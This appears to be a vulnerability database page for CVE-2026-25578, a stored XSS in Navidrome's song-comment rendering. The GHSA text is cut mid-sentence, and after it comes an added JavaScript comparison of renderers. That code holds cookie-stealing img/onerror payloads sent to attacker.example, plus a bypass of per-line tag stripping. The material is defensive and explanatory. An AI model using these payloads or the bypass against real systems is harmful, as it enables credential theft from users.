CVE-2026-25578
Published 2026-02-04
Priority: P4 (29) · Severity: medium · CVSS 3.1 base score: 6.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
EPSS: 0.30% (21.3rd percentile)
Navidrome is an open source web-based music collection server and streamer. Prior to version 0.60.0, a cross-site scripting vulnerability in the frontend allows a malicious attacker to inject code through the comment metadata of a song to exfiltrate user credentials. This issue has been patched in version 0.60.0.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| github.com | navidrome_navidrome | >= 0 < 0.60.0 | 0.60.0 |
| navidrome | navidrome | < 0.60.0 | 0.60.0 |
OSV
osv·2026-02-05
CVE-2026-25578: Navidrome has XSS via comment from song metadata in github.com/navidrome/navidrome
GHSA
ghsa·2026-02-04
CVE-2026-25578 [MEDIUM] CWE-79: Navidrome has XSS via comment from song metadata
### Summary
An XSS vulnerability in the frontend allows a malicious attacker to inject code through the comment metadata of a song to exfiltrate user credentials.
An attacker's maliciously crafted song has to be added to Navidrome to exploit the vulnerability.
### Details
The frontend uses React. In various places, the code uses the `dangerouslySetInnerHTML` escape hatch to set the content of an HTML element.
In some places, the value is first sanitized by removing anything that looks like an HTML tag. In at least one place the value is used as is, which leads to the XSS vulnerability.
In the `MultiLineTextField` component, the input is split into lines and rendered through the `dangerouslySetInnerHTML` property.
This compo
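The rendering pattern the advisory describes, as an added example that is not Navidrome's code or the advisory's: a song comment is split into lines and joined back into HTML three ways (used as is, tag-stripped per line, HTML-escaped per line), modelled as plain string functions so the outputs can be compared without a browser. The `attacker.example` hostname, the cookie-reading payload and the `stripTagsNaive` sanitizer are assumptions for illustration; the advisory only says that some call sites strip tag-like content and at least one uses the value unmodified.

```javascript
// Added example (not Navidrome's code): models a multi-line text field that
// splits a song's comment metadata into lines and hands the result to
// innerHTML, the dangerouslySetInnerHTML shape the advisory describes.

// Constructed sample comments, as an attacker could write them into an audio
// file's tags before the file is added to a library. The hostname and the
// cookie-reading payload are illustrative assumptions.
const BENIGN_COMMENT = 'Great album!\nRipped from the 2009 remaster.';
const CLOSED_TAG_COMMENT =
  'Great album!\n<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';
// Same payload with the final '>' left off. A per-line tag stripper never
// sees a complete tag, and the <br/> appended by the join supplies the '>'
// the browser needs to finish the <img> start tag.
const UNCLOSED_TAG_COMMENT =
  'Great album!\n<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)"';

// 1. Vulnerable: the value is used as is, so any markup in the comment goes
//    live in the DOM.
function renderMultiLineVulnerable(value) {
  return value.split('\n').join('<br/>');
}

// 2. Blocklist-style mitigation (hypothetical): drop anything that looks like
//    a complete tag on each line. Stops the closed payload, not the unclosed one.
function stripTagsNaive(line) {
  return line.replace(/<[^>]*>/g, '');
}
function renderMultiLineStripped(value) {
  return value.split('\n').map(stripTagsNaive).join('<br/>');
}

// 3. Hardened: escape every character with HTML meaning in each line, then add
//    the line breaks the component controls. Metadata can no longer introduce
//    markup. (In React itself, rendering the lines as text children with <br/>
//    elements between them avoids dangerouslySetInnerHTML entirely.)
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}
function renderMultiLineSafe(value) {
  return value.split('\n').map(escapeHtml).join('<br/>');
}

// Check used below: does the produced HTML still contain a '<' other than the
// <br/> separators the renderer inserted itself?
function containsForeignMarkup(html) {
  return html.replace(/<br\/>/g, '').includes('<');
}

// Matrix of renderer x payload -> whether attacker markup survives.
function report() {
  const renderers = { renderMultiLineVulnerable, renderMultiLineStripped, renderMultiLineSafe };
  const out = {};
  for (const [name, fn] of Object.entries(renderers)) {
    out[name] = {
      closed: containsForeignMarkup(fn(CLOSED_TAG_COMMENT)),
      unclosed: containsForeignMarkup(fn(UNCLOSED_TAG_COMMENT)),
    };
  }
  return out;
}

console.log(JSON.stringify(report(), null, 2));
```

Only the escaping variant keeps both payloads inert; the stripping variant reports `unclosed: true`, which is the gap a "remove anything that looks like a tag" pass leaves when the input is processed line by line and then re-joined with markup.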
OSV
osv·2026-02-04
CVE-2026-25578 [MEDIUM]: Navidrome has XSS via comment from song metadata (same advisory text as the GHSA entry)
No detection rules found.
No public exploits indexed.